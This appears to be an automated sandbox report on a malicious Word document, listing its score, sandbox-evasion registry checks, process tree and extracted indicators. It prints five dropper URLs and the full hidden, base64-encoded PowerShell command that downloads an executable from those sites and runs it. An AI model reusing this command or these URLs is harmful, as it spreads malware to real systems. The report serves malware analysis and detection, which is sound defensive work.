Analysis
-
max time kernel
22s -
resource
win10v191014 -
submitted
13-12-2019 16:11
General
-
Target
56bb78c724fd0859c5350bd16ea2383fc4f8715fa389f7a4ec4df560ce5f9792.doc
-
Sample
191213-valqpjagqx
-
SHA256
56bb78c724fd0859c5350bd16ea2383fc4f8715fa389f7a4ec4df560ce5f9792
Score
8/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
https://bahcelievler-rotary.org/wp-admin/x4PHK0/
exe.dropper
https://sageth.net/wp-content/fu9yz/
exe.dropper
https://newlandred.com/wp-snapshots/CsfcooA/
exe.dropper
https://hellothuoctot.com/wp-content/VzMjXw/
exe.dropper
http://www.enegix.com/wp-includes/21fap/
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4992 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXE611.exepid process 4992 WINWORD.EXE 4796 611.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4992 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4668 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4668 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
SppExtComObj.exePowershell.exedescription pid process target process PID 4048 wrote to memory of 4524 4048 SppExtComObj.exe SLUI.exe PID 4668 wrote to memory of 4796 4668 Powershell.exe 611.exe -
Executes dropped EXE 1 IoCs
Processes:
611.exepid process 4796 611.exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
Processes:
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\56bb78c724fd0859c5350bd16ea2383fc4f8715fa389f7a4ec4df560ce5f9792.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:4992
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:4524
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABGAGQAeQB1AHQAcABvAHMAPQAnAFoAegBrAGsAbgB1AHkAZQBtAGEAcwB0ACcAOwAkAE8AbgBpAHAAbgBwAGEAcgBkAHIAIAA9ACAAJwA2ADEAMQAnADsAJABVAHAAZgB0AHQAdQByAHkAbQBqAGEAYQA9ACcAVQBtAHoAbwB0AG4AaQBlACcAOwAkAEwAeQBpAG4AbwBvAGQAeQB4AHcAawBhAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAG4AaQBwAG4AcABhAHIAZAByACsAJwAuAGUAeABlACcAOwAkAEYAcwB6AGUAcABqAGwAbgA9ACcAWgBhAGkAegBiAHoAaQBiACcAOwAkAE0AaAB1AG8AZABvAHEAbgBpAGgAeAA9ACYAKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQBjACcAKwAnAHQAJwApACAAbgBFAHQALgB3AGUAYgBjAGwAaQBlAG4AVAA7ACQAUwBpAG0AZwBzAGkAbgB6AD0AJwBoAHQAdABwAHMAOgAvAC8AYgBhAGgAYwBlAGwAaQBlAHYAbABlAHIALQByAG8AdABhAHIAeQAuAG8AcgBnAC8AdwBwAC0AYQBkAG0AaQBuAC8AeAA0AFAASABLADAALwAqAGgAdAB0AHAAcwA6AC8ALwBzAGEAZwBlAHQAaAAuAG4AZQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGYAdQA5AHkAegAvACoAaAB0AHQAcABzADoALwAvAG4AZQB3AGwAYQBuAGQAcgBlAGQALgBjAG8AbQAvAHcAcAAtAHMAbgBhAHAAcwBoAG8AdABzAC8AQwBzAGYAYwBvAG8AQQAvACoAaAB0AHQAcABzADoALwAvAGgAZQBsAGwAbwB0AGgAdQBvAGMAdABvAHQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBWAHoATQBqAFgAdwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGUAbgBlAGcAaQB4AC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwAyADEAZgBhAHAALwAnAC4AIgBzAHAAYABsAGkAdAAiACgAJwAqACcAKQA7ACQATgB1AHYAYgByAG4AdABlAD0AJwBLAHAAbQBkAG4AYgB2AG4AaQBkAHgAbQBtACcAOwBmAG8AcgBlAGEAYwBoACgAJABUAHcAYQB4AGEAbABkAGQAeQBiAGoAYwAgAGkAbgAgACQAUwBpAG0AZwBzAGkAbgB6ACkAewB0AHIAeQB7ACQATQBoAHUAbwBkAG8AcQBuAGkAaAB4AC4AIgBEAE8AYABXAG4AYABsAE8AQQBgAGQARgBpAEwARQAiACgAJABUAHcAYQB4AGEAbABkAGQAeQBiAGoAYwAsACAAJABMAHkAaQBuAG8AbwBkAHkAeAB3AGsAYQApADsAJABVAGQAYQBuAHQAZgBnAGgAPQAnAEwAeAB4AG0AYgBwAGgAcgBxAHAAagAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEwAeQBpAG4AbwBvAGQAeQB4AHcAawBhACkALgAiAEwAZQBgAE4ARwBUAEgAIgAgAC0AZwBlACAAMwAwADcANAA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABgAEEAUgBUACIAKAAkAEwAeQBpAG4AbwBvAGQAeQB4AHcAawBhACkAOwAkAEEAZQB2AHMAdABkAGEAaQBzAHgAPQAnAFMAcgBjAHIAZQBpAGsAbgBiAGQAJwA7AGIAcgBlAGEAawA7ACQASABvAHEAdgB3AG0AdQBnAD0AJwBNAG8AawBvAG4AeQBvAGQAZQBhAG8AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUABvAHkAbABiAGQAcgBrAHcAaAB1AGsAZgA9ACcATABnAGQAcgBtAGUAZQBuAGcAJwA=1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4668 -
C:\Users\Admin\611.exe"C:\Users\Admin\611.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:4796